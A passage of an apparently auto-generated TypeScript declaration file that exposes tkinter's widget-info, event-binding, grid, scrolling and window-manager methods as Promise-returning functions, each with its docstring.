Promise<any>\n\n\t\t/**\n\t\t * Return name of atom with identifier ID.\n\t\t */\n\t\twinfo_atomname(id, displayof?): Promise<any>\n\t\twinfo_atomname$({ id, displayof }: { id, displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Return number of cells in the colormap for this widget.\n\t\t */\n\t\twinfo_cells(): Promise<any>\n\t\twinfo_cells$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all widgets which are children of this widget.\n\t\t */\n\t\twinfo_children(): Promise<any>\n\t\twinfo_children$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return window class name of this widget.\n\t\t */\n\t\twinfo_class(): Promise<any>\n\t\twinfo_class$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if at the last color request the colormap was full.\n\t\t */\n\t\twinfo_colormapfull(): Promise<any>\n\t\twinfo_colormapfull$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the widget which is at the root coordinates ROOTX, ROOTY.\n\t\t */\n\t\twinfo_containing(rootX, rootY, displayof?): Promise<any>\n\t\twinfo_containing$({ rootX, rootY, displayof }: { rootX, rootY, displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of bits per pixel.\n\t\t */\n\t\twinfo_depth(): Promise<any>\n\t\twinfo_depth$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return true if this widget exists.\n\t\t */\n\t\twinfo_exists(): Promise<any>\n\t\twinfo_exists$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return 
the number of pixels for the given distance NUMBER\n\t\t * (e.g. \"3c\") as float.\n\t\t */\n\t\twinfo_fpixels(number): Promise<any>\n\t\twinfo_fpixels$({ number }): Promise<any>\n\n\t\t/**\n\t\t * Return geometry string for this widget in the form \"widthxheight+X+Y\".\n\t\t */\n\t\twinfo_geometry(): Promise<any>\n\t\twinfo_geometry$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return height of this widget.\n\t\t */\n\t\twinfo_height(): Promise<any>\n\t\twinfo_height$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return identifier ID for this widget.\n\t\t */\n\t\twinfo_id(): Promise<any>\n\t\twinfo_id$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the name of all Tcl interpreters for this display.\n\t\t */\n\t\twinfo_interps(displayof?): Promise<any>\n\t\twinfo_interps$({ displayof }: { displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Return true if this widget is mapped.\n\t\t */\n\t\twinfo_ismapped(): Promise<any>\n\t\twinfo_ismapped$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the window manager name for this widget.\n\t\t */\n\t\twinfo_manager(): Promise<any>\n\t\twinfo_manager$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the name of this widget.\n\t\t */\n\t\twinfo_name(): Promise<any>\n\t\twinfo_name$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the name of the parent of this widget.\n\t\t */\n\t\twinfo_parent(): Promise<any>\n\t\twinfo_parent$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the pathname of the widget given by ID.\n\t\t */\n\t\twinfo_pathname(id, displayof?): Promise<any>\n\t\twinfo_pathname$({ id, displayof }: { id, displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Rounded integer value of winfo_fpixels.\n\t\t */\n\t\twinfo_pixels(number): Promise<any>\n\t\twinfo_pixels$({ number }): Promise<any>\n\n\t\t/**\n\t\t * Return the x coordinate of the pointer on the root window.\n\t\t */\n\t\twinfo_pointerx(): Promise<any>\n\t\twinfo_pointerx$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of x and y coordinates of the pointer on the root window.\n\t\t */\n\t\twinfo_pointerxy(): Promise<any>\n\t\twinfo_pointerxy$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the y coordinate of the pointer on the root window.\n\t\t */\n\t\twinfo_pointery(): Promise<any>\n\t\twinfo_pointery$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return requested height of this widget.\n\t\t */\n\t\twinfo_reqheight(): Promise<any>\n\t\twinfo_reqheight$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return requested width of this widget.\n\t\t */\n\t\twinfo_reqwidth(): Promise<any>\n\t\twinfo_reqwidth$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of integer RGB values in range(65536) for color in this widget.\n\t\t */\n\t\twinfo_rgb(color): Promise<any>\n\t\twinfo_rgb$({ color }): Promise<any>\n\n\t\t/**\n\t\t * Return x coordinate of upper left corner of this widget on the\n\t\t * root window.\n\t\t */\n\t\twinfo_rootx(): Promise<any>\n\t\twinfo_rootx$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return y coordinate of upper left corner of this widget on the\n\t\t * root window.\n\t\t */\n\t\twinfo_rooty(): Promise<any>\n\t\twinfo_rooty$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the screen name of this widget.\n\t\t */\n\t\twinfo_screen(): Promise<any>\n\t\twinfo_screen$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of the cells in the colormap of the screen\n\t\t * of this widget.\n\t\t */\n\t\twinfo_screencells(): Promise<any>\n\t\twinfo_screencells$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of bits per pixel of the root window of the\n\t\t * screen of this widget.\n\t\t 
*/\n\t\twinfo_screendepth(): Promise<any>\n\t\twinfo_screendepth$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of pixels of the height of the screen of this widget\n\t\t * in pixel.\n\t\t */\n\t\twinfo_screenheight(): Promise<any>\n\t\twinfo_screenheight$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of pixels of the height of the screen of\n\t\t * this widget in mm.\n\t\t */\n\t\twinfo_screenmmheight(): Promise<any>\n\t\twinfo_screenmmheight$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of pixels of the width of the screen of\n\t\t * this widget in mm.\n\t\t */\n\t\twinfo_screenmmwidth(): Promise<any>\n\t\twinfo_screenmmwidth$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return one of the strings directcolor, grayscale, pseudocolor,\n\t\t * staticcolor, staticgray, or truecolor for the default\n\t\t * colormodel of this screen.\n\t\t */\n\t\twinfo_screenvisual(): Promise<any>\n\t\twinfo_screenvisual$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of pixels of the width of the screen of\n\t\t * this widget in pixel.\n\t\t */\n\t\twinfo_screenwidth(): Promise<any>\n\t\twinfo_screenwidth$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return information of the X-Server of the screen of this widget in\n\t\t * the form \"XmajorRminor vendor vendorVersion\".\n\t\t */\n\t\twinfo_server(): Promise<any>\n\t\twinfo_server$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the toplevel widget of this widget.\n\t\t */\n\t\twinfo_toplevel(): Promise<any>\n\t\twinfo_toplevel$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return true if the widget and all its higher ancestors are mapped.\n\t\t */\n\t\twinfo_viewable(): Promise<any>\n\t\twinfo_viewable$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return one of the strings directcolor, grayscale, pseudocolor,\n\t\t * staticcolor, staticgray, or truecolor for the\n\t\t * colormodel of this widget.\n\t\t */\n\t\twinfo_visual(): Promise<any>\n\t\twinfo_visual$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the X identifier for the visual for this widget.\n\t\t */\n\t\twinfo_visualid(): Promise<any>\n\t\twinfo_visualid$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all visuals available for the screen\n\t\t * of this widget.\n\t\t * \n\t\t * Each item in the list consists of a visual name (see winfo_visual), a\n\t\t * depth and if includeids is true is given also the X identifier.\n\t\t */\n\t\twinfo_visualsavailable(includeids?: boolean): Promise<any>\n\t\twinfo_visualsavailable$({ includeids }: { includeids?}): Promise<any>\n\n\t\t/**\n\t\t * Return the height of the virtual root window associated with this\n\t\t * widget in pixels. If there is no virtual root window return the\n\t\t * height of the screen.\n\t\t */\n\t\twinfo_vrootheight(): Promise<any>\n\t\twinfo_vrootheight$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the width of the virtual root window associated with this\n\t\t * widget in pixel. 
If there is no virtual root window return the\n\t\t * width of the screen.\n\t\t */\n\t\twinfo_vrootwidth(): Promise<any>\n\t\twinfo_vrootwidth$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the x offset of the virtual root relative to the root\n\t\t * window of the screen of this widget.\n\t\t */\n\t\twinfo_vrootx(): Promise<any>\n\t\twinfo_vrootx$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the y offset of the virtual root relative to the root\n\t\t * window of the screen of this widget.\n\t\t */\n\t\twinfo_vrooty(): Promise<any>\n\t\twinfo_vrooty$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the width of this widget.\n\t\t */\n\t\twinfo_width(): Promise<any>\n\t\twinfo_width$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the x coordinate of the upper left corner of this widget\n\t\t * in the parent.\n\t\t */\n\t\twinfo_x(): Promise<any>\n\t\twinfo_x$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the y coordinate of the upper left corner of this widget\n\t\t * in the parent.\n\t\t */\n\t\twinfo_y(): Promise<any>\n\t\twinfo_y$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Enter event loop until all pending events have been processed by Tcl.\n\t\t */\n\t\tupdate(): Promise<any>\n\t\tupdate$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Enter event loop until all idle callbacks have been called. This\n\t\t * will update the display of windows but not process events caused by\n\t\t * the user.\n\t\t */\n\t\tupdate_idletasks(): Promise<any>\n\t\tupdate_idletasks$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set or get the list of bindtags for this widget.\n\t\t * \n\t\t * With no argument return the list of all bindtags associated with\n\t\t * this widget. With a list of strings as argument the bindtags are\n\t\t * set to this list. The bindtags determine in which order events are\n\t\t * processed (see bind).\n\t\t */\n\t\tbindtags(tagList?): Promise<any>\n\t\tbindtags$({ tagList }: { tagList?}): Promise<any>\n\n\t\t/**\n\t\t * Bind to this widget at event SEQUENCE a call to function FUNC.\n\t\t * \n\t\t * SEQUENCE is a string of concatenated event\n\t\t * patterns. An event pattern is of the form\n\t\t * <MODIFIER-MODIFIER-TYPE-DETAIL> where MODIFIER is one\n\t\t * of Control, Mod2, M2, Shift, Mod3, M3, Lock, Mod4, M4,\n\t\t * Button1, B1, Mod5, M5 Button2, B2, Meta, M, Button3,\n\t\t * B3, Alt, Button4, B4, Double, Button5, B5 Triple,\n\t\t * Mod1, M1. TYPE is one of Activate, Enter, Map,\n\t\t * ButtonPress, Button, Expose, Motion, ButtonRelease\n\t\t * FocusIn, MouseWheel, Circulate, FocusOut, Property,\n\t\t * Colormap, Gravity Reparent, Configure, KeyPress, Key,\n\t\t * Unmap, Deactivate, KeyRelease Visibility, Destroy,\n\t\t * Leave and DETAIL is the button number for ButtonPress,\n\t\t * ButtonRelease and DETAIL is the Keysym for KeyPress and\n\t\t * KeyRelease. Examples are\n\t\t * <Control-Button-1> for pressing Control and mouse button 1 or\n\t\t * <Alt-A> for pressing A and the Alt key (KeyPress can be omitted).\n\t\t * An event pattern can also be a virtual event of the form\n\t\t * <<AString>> where AString can be arbitrary. This\n\t\t * event can be generated by event_generate.\n\t\t * If events are concatenated they must appear shortly\n\t\t * after each other.\n\t\t * \n\t\t * FUNC will be called if the event sequence occurs with an\n\t\t * instance of Event as argument. 
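(A minimal sketch; `widget` is assumed to implement IMisc and `onClick` to be a bridge-side callback:\n\t\t * \n\t\t * const funcid = await widget.bind$({ sequence: '<Control-Button-1>', func: onClick })\n\t\t * // later, to remove it: await widget.unbind$({ sequence: '<Control-Button-1>', funcid })\n\t\t * )\n\t\t * 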
If the return value of FUNC is\n\t\t * \"break\" no further bound function is invoked.\n\t\t * \n\t\t * An additional boolean parameter ADD specifies whether FUNC will\n\t\t * be called additionally to the other bound function or whether\n\t\t * it will replace the previous function.\n\t\t * \n\t\t * Bind will return an identifier to allow deletion of the bound function with\n\t\t * unbind without memory leak.\n\t\t * \n\t\t * If FUNC or SEQUENCE is omitted the bound function or list\n\t\t * of bound events are returned.\n\t\t */\n\t\tbind(sequence?, func?, add?): Promise<any>\n\t\tbind$({ sequence, func, add }: { sequence?, func?, add?}): Promise<any>\n\n\t\t/**\n\t\t * Unbind for this widget for event SEQUENCE the\n\t\t * function identified with FUNCID.\n\t\t */\n\t\tunbind(sequence, funcid?): Promise<any>\n\t\tunbind$({ sequence, funcid }: { sequence, funcid?}): Promise<any>\n\n\t\t/**\n\t\t * Bind to all widgets at an event SEQUENCE a call to function FUNC.\n\t\t * An additional boolean parameter ADD specifies whether FUNC will\n\t\t * be called additionally to the other bound function or whether\n\t\t * it will replace the previous function. See bind for the return value.\n\t\t */\n\t\tbind_all(sequence?, func?, add?): Promise<any>\n\t\tbind_all$({ sequence, func, add }: { sequence?, func?, add?}): Promise<any>\n\n\t\t/**\n\t\t * Unbind for all widgets for event SEQUENCE all functions.\n\t\t */\n\t\tunbind_all(sequence): Promise<any>\n\t\tunbind_all$({ sequence }): Promise<any>\n\n\t\t/**\n\t\t * Bind to widgets with bindtag CLASSNAME at event\n\t\t * SEQUENCE a call of function FUNC. An additional\n\t\t * boolean parameter ADD specifies whether FUNC will be\n\t\t * called additionally to the other bound function or\n\t\t * whether it will replace the previous function. See bind for\n\t\t * the return value.\n\t\t */\n\t\tbind_class(className, sequence?, func?, add?): Promise<any>\n\t\tbind_class$({ className, sequence, func, add }: { className, sequence?, func?, add?}): Promise<any>\n\n\t\t/**\n\t\t * Unbind for all widgets with bindtag CLASSNAME for event SEQUENCE\n\t\t * all functions.\n\t\t */\n\t\tunbind_class(className, sequence): Promise<any>\n\t\tunbind_class$({ className, sequence }): Promise<any>\n\n\t\t/**\n\t\t * Call the mainloop of Tk.\n\t\t */\n\t\tmainloop(n?): Promise<any>\n\t\tmainloop$({ n }: { n?}): Promise<any>\n\n\t\t/**\n\t\t * Quit the Tcl interpreter. All widgets will be destroyed.\n\t\t */\n\t\tquit(): Promise<any>\n\t\tquit$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the Tkinter instance of a widget identified by\n\t\t * its Tcl name NAME.\n\t\t */\n\t\tnametowidget(name): Promise<any>\n\t\tnametowidget$({ name }): Promise<any>\n\n\t\t/**\n\t\t * Configure resources of a widget.\n\t\t * \n\t\t * The values for resources are specified as keyword\n\t\t * arguments. To get an overview about\n\t\t * the allowed keyword arguments call the method keys.\n\t\t * \n\t\t */\n\t\tconfigure(cnf?): Promise<any>\n\t\tconfigure$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Return the resource value for a KEY given as string.\n\t\t */\n\t\tcget(key): Promise<any>\n\t\tcget$({ key }): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all resource names of this widget.\n\t\t */\n\t\tkeys(): Promise<any>\n\t\tkeys$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set or get the status for propagation of geometry information.\n\t\t * \n\t\t * A boolean argument specifies whether the geometry information\n\t\t * of the slaves will determine the size of this widget. 
If no argument\n\t\t * is given the current setting will be returned.\n\t\t * \n\t\t */\n\t\tpack_propagate(flag?): Promise<any>\n\t\tpack_propagate$({ flag }: { flag?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all slaves of this widget\n\t\t * in its packing order.\n\t\t */\n\t\tpack_slaves(): Promise<any>\n\t\tpack_slaves$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all slaves of this widget\n\t\t * in its packing order.\n\t\t */\n\t\tplace_slaves(): Promise<any>\n\t\tplace_slaves$($: {}): Promise<any>\n\n\t\t/**\n\t\t * The anchor value controls how to place the grid within the\n\t\t * master when no row/column has any weight.\n\t\t * \n\t\t * The default anchor is nw.\n\t\t */\n\t\tgrid_anchor(anchor?): Promise<any>\n\t\tgrid_anchor$({ anchor }: { anchor?}): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of integer coordinates for the bounding\n\t\t * box of this widget controlled by the geometry manager grid.\n\t\t * \n\t\t * If COLUMN, ROW is given the bounding box applies from\n\t\t * the cell with row and column 0 to the specified\n\t\t * cell. If COL2 and ROW2 are given the bounding box\n\t\t * starts at that cell.\n\t\t * \n\t\t * The returned integers specify the offset of the upper left\n\t\t * corner in the master widget and the width and height.\n\t\t * \n\t\t */\n\t\tgrid_bbox(column?, row?, col2?, row2?): Promise<any>\n\t\tgrid_bbox$({ column, row, col2, row2 }: { column?, row?, col2?, row2?}): Promise<any>\n\n\t\t/**\n\t\t * Configure column INDEX of a grid.\n\t\t * \n\t\t * Valid resources are minsize (minimum size of the column),\n\t\t * weight (how much does additional space propagate to this column)\n\t\t * and pad (how much space to let additionally).\n\t\t */\n\t\tgrid_columnconfigure(index, cnf?): Promise<any>\n\t\tgrid_columnconfigure$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of column and row which identify the cell\n\t\t * at which the pixel at position X and Y inside the master\n\t\t * widget is located.\n\t\t */\n\t\tgrid_location(x, y): Promise<any>\n\t\tgrid_location$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Set or get the status for propagation of geometry information.\n\t\t * \n\t\t * A boolean argument specifies whether the geometry information\n\t\t * of the slaves will determine the size of this widget. 
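A hypothetical\n\t\t * sketch ('master' is an assumed widget instance):\n\t\t * \n\t\t *     await master.grid_propagate(0)  // keep the master at its own size\n\t\t * \n\t\t * 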
If no argument\n\t\t * is given, the current setting will be returned.\n\t\t * \n\t\t */\n\t\tgrid_propagate(flag?): Promise<any>\n\t\tgrid_propagate$({ flag }: { flag?}): Promise<any>\n\n\t\t/**\n\t\t * Configure row INDEX of a grid.\n\t\t * \n\t\t * Valid resources are minsize (minimum size of the row),\n\t\t * weight (how much does additional space propagate to this row)\n\t\t * and pad (how much space to let additionally).\n\t\t */\n\t\tgrid_rowconfigure(index, cnf?): Promise<any>\n\t\tgrid_rowconfigure$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of the number of columns and rows in the grid.\n\t\t */\n\t\tgrid_size(): Promise<any>\n\t\tgrid_size$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all slaves of this widget\n\t\t * in its packing order.\n\t\t */\n\t\tgrid_slaves(row?, column?): Promise<any>\n\t\tgrid_slaves$({ row, column }: { row?, column?}): Promise<any>\n\n\t\t/**\n\t\t * Bind a virtual event VIRTUAL (of the form <<Name>>)\n\t\t * to an event SEQUENCE such that the virtual event is triggered\n\t\t * whenever SEQUENCE occurs.\n\t\t */\n\t\tevent_add(virtual): Promise<any>\n\t\tevent_add$({ virtual }): Promise<any>\n\n\t\t/**\n\t\t * Unbind a virtual event VIRTUAL from SEQUENCE.\n\t\t */\n\t\tevent_delete(virtual): Promise<any>\n\t\tevent_delete$({ virtual }): Promise<any>\n\n\t\t/**\n\t\t * Generate an event SEQUENCE. Additional\n\t\t * keyword arguments specify parameters of the event\n\t\t * (e.g. x, y, rootx, rooty).\n\t\t */\n\t\tevent_generate(sequence): Promise<any>\n\t\tevent_generate$({ sequence }): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all virtual events or the information\n\t\t * about the SEQUENCE bound to the virtual event VIRTUAL.\n\t\t */\n\t\tevent_info(virtual?): Promise<any>\n\t\tevent_info$({ virtual }: { virtual?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all existing image names.\n\t\t */\n\t\timage_names(): Promise<any>\n\t\timage_names$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all available image types (e.g. photo bitmap).\n\t\t */\n\t\timage_types(): Promise<any>\n\t\timage_types$($: {}): Promise<any>\n\t\twaitvar\n\t\tfocus\n\t\tlift\n\t\tregister\n\t\tconfig\n\t\tpropagate\n\t\tslaves\n\t\tanchor\n\t\tbbox\n\t\tcolumnconfigure\n\t\trowconfigure\n\t\tsize\n\t}\n\n\t/**\n\t * Internal class. Stores function to call when some user\n\t * defined Tcl function is called e.g. 
after an event occurred.\n\t */\n\n\t/**\n\t * Store FUNC, SUBST and WIDGET as members.\n\t */\n\tfunction CallWrapper(func, subst, widget): Promise<ICallWrapper>\n\tfunction CallWrapper$({ func, subst, widget }): Promise<ICallWrapper>\n\tinterface ICallWrapper {\n\t}\n\n\t/**\n\t * Mix-in class for querying and changing the horizontal position\n\t * of a widget's window.\n\t */\n\tinterface IXView {\n\n\t\t/**\n\t\t * Query and change the horizontal position of the view.\n\t\t */\n\t\txview(): Promise<any>\n\t\txview$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Adjusts the view in the window so that FRACTION of the\n\t\t * total width of the canvas is off-screen to the left.\n\t\t */\n\t\txview_moveto(fraction): Promise<any>\n\t\txview_moveto$({ fraction }): Promise<any>\n\n\t\t/**\n\t\t * Shift the x-view according to NUMBER which is measured in \"units\"\n\t\t * or \"pages\" (WHAT).\n\t\t */\n\t\txview_scroll(number, what): Promise<any>\n\t\txview_scroll$({ number, what }): Promise<any>\n\t}\n\n\t/**\n\t * Mix-in class for querying and changing the vertical position\n\t * of a widget's window.\n\t */\n\tinterface IYView {\n\n\t\t/**\n\t\t * Query and change the vertical position of the view.\n\t\t */\n\t\tyview(): Promise<any>\n\t\tyview$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Adjusts the view in the window so that FRACTION of the\n\t\t * total height of the canvas is off-screen to the top.\n\t\t */\n\t\tyview_moveto(fraction): Promise<any>\n\t\tyview_moveto$({ fraction }): Promise<any>\n\n\t\t/**\n\t\t * Shift the y-view according to NUMBER which is measured in\n\t\t * \"units\" or \"pages\" (WHAT).\n\t\t */\n\t\tyview_scroll(number, what): Promise<any>\n\t\tyview_scroll$({ number, what }): Promise<any>\n\t}\n\n\t/**\n\t * Provides functions for the communication with the window manager.\n\t */\n\tinterface IWm {\n\n\t\t/**\n\t\t * Instruct the window manager to set the aspect ratio (width/height)\n\t\t * of this widget to be between MINNUMER/MINDENOM and MAXNUMER/MAXDENOM. Return a tuple\n\t\t * of the actual values if no argument is given.\n\t\t */\n\t\twm_aspect(minNumer?, minDenom?, maxNumer?, maxDenom?): Promise<any>\n\t\twm_aspect$({ minNumer, minDenom, maxNumer, maxDenom }: { minNumer?, minDenom?, maxNumer?, maxDenom?}): Promise<any>\n\n\t\t/**\n\t\t * This subcommand returns or sets platform specific attributes\n\t\t * \n\t\t * The first form returns a list of the platform specific flags and\n\t\t * their values. The second form returns the value for the specific\n\t\t * option. The third form sets one or more of the values. The values\n\t\t * are as follows:\n\t\t * \n\t\t * On Windows, -disabled gets or sets whether the window is in a\n\t\t * disabled state. -toolwindow gets or sets the style of the window\n\t\t * to toolwindow (as defined in the MSDN). -topmost gets or sets\n\t\t * whether this is a topmost window (displays above all other\n\t\t * windows).\n\t\t * \n\t\t * On Macintosh, XXXXX\n\t\t * \n\t\t * On Unix, there are currently no special attribute values.\n\t\t * \n\t\t */\n\t\twm_attributes(): Promise<any>\n\t\twm_attributes$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Store NAME in WM_CLIENT_MACHINE property of this widget. Return\n\t\t * current value.\n\t\t */\n\t\twm_client(name?): Promise<any>\n\t\twm_client$({ name }: { name?}): Promise<any>\n\n\t\t/**\n\t\t * Store list of window names (WLIST) into WM_COLORMAPWINDOWS property\n\t\t * of this widget. This list contains windows whose colormaps differ from their\n\t\t * parents. 
Return current list of widgets if WLIST is empty.\n\t\t */\n\t\twm_colormapwindows(): Promise<any>\n\t\twm_colormapwindows$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Store VALUE in WM_COMMAND property. It is the command\n\t\t * which shall be used to invoke the application. Return current\n\t\t * command if VALUE is None.\n\t\t */\n\t\twm_command(value?): Promise<any>\n\t\twm_command$({ value }: { value?}): Promise<any>\n\n\t\t/**\n\t\t * Deiconify this widget. If it was never mapped it will not be mapped.\n\t\t * On Windows it will raise this widget and give it the focus.\n\t\t */\n\t\twm_deiconify(): Promise<any>\n\t\twm_deiconify$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set focus model to MODEL. \"active\" means that this widget will claim\n\t\t * the focus itself, \"passive\" means that the window manager shall give\n\t\t * the focus. Return current focus model if MODEL is None.\n\t\t */\n\t\twm_focusmodel(model?): Promise<any>\n\t\twm_focusmodel$({ model }: { model?}): Promise<any>\n\n\t\t/**\n\t\t * The window will be unmapped from the screen and will no longer\n\t\t * be managed by wm. toplevel windows will be treated like frame\n\t\t * windows once they are no longer managed by wm, however, the menu\n\t\t * option configuration will be remembered and the menus will return\n\t\t * once the widget is managed again.\n\t\t */\n\t\twm_forget(window): Promise<any>\n\t\twm_forget$({ window }): Promise<any>\n\n\t\t/**\n\t\t * Return identifier for decorative frame of this widget if present.\n\t\t */\n\t\twm_frame(): Promise<any>\n\t\twm_frame$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set geometry to NEWGEOMETRY of the form =widthxheight+x+y. Return\n\t\t * current value if None is given.\n\t\t */\n\t\twm_geometry(newGeometry?): Promise<any>\n\t\twm_geometry$({ newGeometry }: { newGeometry?}): Promise<any>\n\n\t\t/**\n\t\t * Instruct the window manager that this widget shall only be\n\t\t * resized on grid boundaries. WIDTHINC and HEIGHTINC are the width and\n\t\t * height of a grid unit in pixels. BASEWIDTH and BASEHEIGHT are the\n\t\t * number of grid units requested in Tk_GeometryRequest.\n\t\t */\n\t\twm_grid(baseWidth?, baseHeight?, widthInc?, heightInc?): Promise<any>\n\t\twm_grid$({ baseWidth, baseHeight, widthInc, heightInc }: { baseWidth?, baseHeight?, widthInc?, heightInc?}): Promise<any>\n\n\t\t/**\n\t\t * Set the group leader widgets for related widgets to PATHNAME. Return\n\t\t * the group leader of this widget if None is given.\n\t\t */\n\t\twm_group(pathName?): Promise<any>\n\t\twm_group$({ pathName }: { pathName?}): Promise<any>\n\n\t\t/**\n\t\t * Set bitmap for the iconified widget to BITMAP. Return\n\t\t * the bitmap if None is given.\n\t\t * \n\t\t * Under Windows, the DEFAULT parameter can be used to set the icon\n\t\t * for the widget and any descendants that don't have an icon set\n\t\t * explicitly. DEFAULT can be the relative path to a .ico file\n\t\t * (example: root.iconbitmap(default='myicon.ico') ). See Tk\n\t\t * documentation for more information.\n\t\t */\n\t\twm_iconbitmap(bitmap?, def?): Promise<any>\n\t\twm_iconbitmap$({ bitmap, def }: { bitmap?, def?}): Promise<any>\n\n\t\t/**\n\t\t * Display widget as icon.\n\t\t */\n\t\twm_iconify(): Promise<any>\n\t\twm_iconify$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set mask for the icon bitmap of this widget. Return the\n\t\t * mask if None is given.\n\t\t */\n\t\twm_iconmask(bitmap?): Promise<any>\n\t\twm_iconmask$({ bitmap }: { bitmap?}): Promise<any>\n\n\t\t/**\n\t\t * Set the name of the icon for this widget. 
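For example (hypothetical;\n\t\t * 'top' is an assumed toplevel instance): await top.wm_iconname('myapp'). 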
Return the name if\n\t\t * None is given.\n\t\t */\n\t\twm_iconname(newName?): Promise<any>\n\t\twm_iconname$({ newName }: { newName?}): Promise<any>\n\n\t\t/**\n\t\t * Sets the titlebar icon for this window based on the named photo\n\t\t * images passed through args. If default is True, this is applied to\n\t\t * all subsequently created toplevels as well.\n\t\t * \n\t\t * The data in the images is taken as a snapshot at the time of\n\t\t * invocation. If the images are later changed, this is not reflected\n\t\t * to the titlebar icons. Multiple images are accepted to allow\n\t\t * different image sizes to be provided. The window manager may scale\n\t\t * provided icons to an appropriate size.\n\t\t * \n\t\t * On Windows, the images are packed into a Windows icon structure.\n\t\t * This will override an icon specified to wm_iconbitmap, and vice\n\t\t * versa.\n\t\t * \n\t\t * On X, the images are arranged into the _NET_WM_ICON X property,\n\t\t * which most modern window managers support. An icon specified by\n\t\t * wm_iconbitmap may exist simultaneously.\n\t\t * \n\t\t * On Macintosh, this currently does nothing.\n\t\t */\n\t\twm_iconphoto(def?: boolean): Promise<any>\n\t\twm_iconphoto$({ def }: { def?}): Promise<any>\n\n\t\t/**\n\t\t * Set the position of the icon of this widget to X and Y. Return\n\t\t * a tuple of the current values of X and Y if None is given.\n\t\t */\n\t\twm_iconposition(x?, y?): Promise<any>\n\t\twm_iconposition$({ x, y }: { x?, y?}): Promise<any>\n\n\t\t/**\n\t\t * Set widget PATHNAME to be displayed instead of icon. Return the current\n\t\t * value if None is given.\n\t\t */\n\t\twm_iconwindow(pathName?): Promise<any>\n\t\twm_iconwindow$({ pathName }: { pathName?}): Promise<any>\n\n\t\t/**\n\t\t * The widget specified will become a standalone top-level window.\n\t\t * The window will be decorated with the window manager's title bar,\n\t\t * etc.\n\t\t */\n\t\twm_manage(widget): Promise<any>\n\t\twm_manage$({ widget }): Promise<any>\n\n\t\t/**\n\t\t * Set max WIDTH and HEIGHT for this widget. If the window is gridded\n\t\t * the values are given in grid units. Return the current values if None\n\t\t * is given.\n\t\t */\n\t\twm_maxsize(width?, height?): Promise<any>\n\t\twm_maxsize$({ width, height }: { width?, height?}): Promise<any>\n\n\t\t/**\n\t\t * Set min WIDTH and HEIGHT for this widget. If the window is gridded\n\t\t * the values are given in grid units. Return the current values if None\n\t\t * is given.\n\t\t */\n\t\twm_minsize(width?, height?): Promise<any>\n\t\twm_minsize$({ width, height }: { width?, height?}): Promise<any>\n\n\t\t/**\n\t\t * Instruct the window manager to ignore this widget\n\t\t * if BOOLEAN is given with 1. Return the current value if None\n\t\t * is given.\n\t\t */\n\t\twm_overrideredirect(boolean?): Promise<any>\n\t\twm_overrideredirect$({ boolean }: { boolean?}): Promise<any>\n\n\t\t/**\n\t\t * Instruct the window manager that the position of this widget shall\n\t\t * be defined by 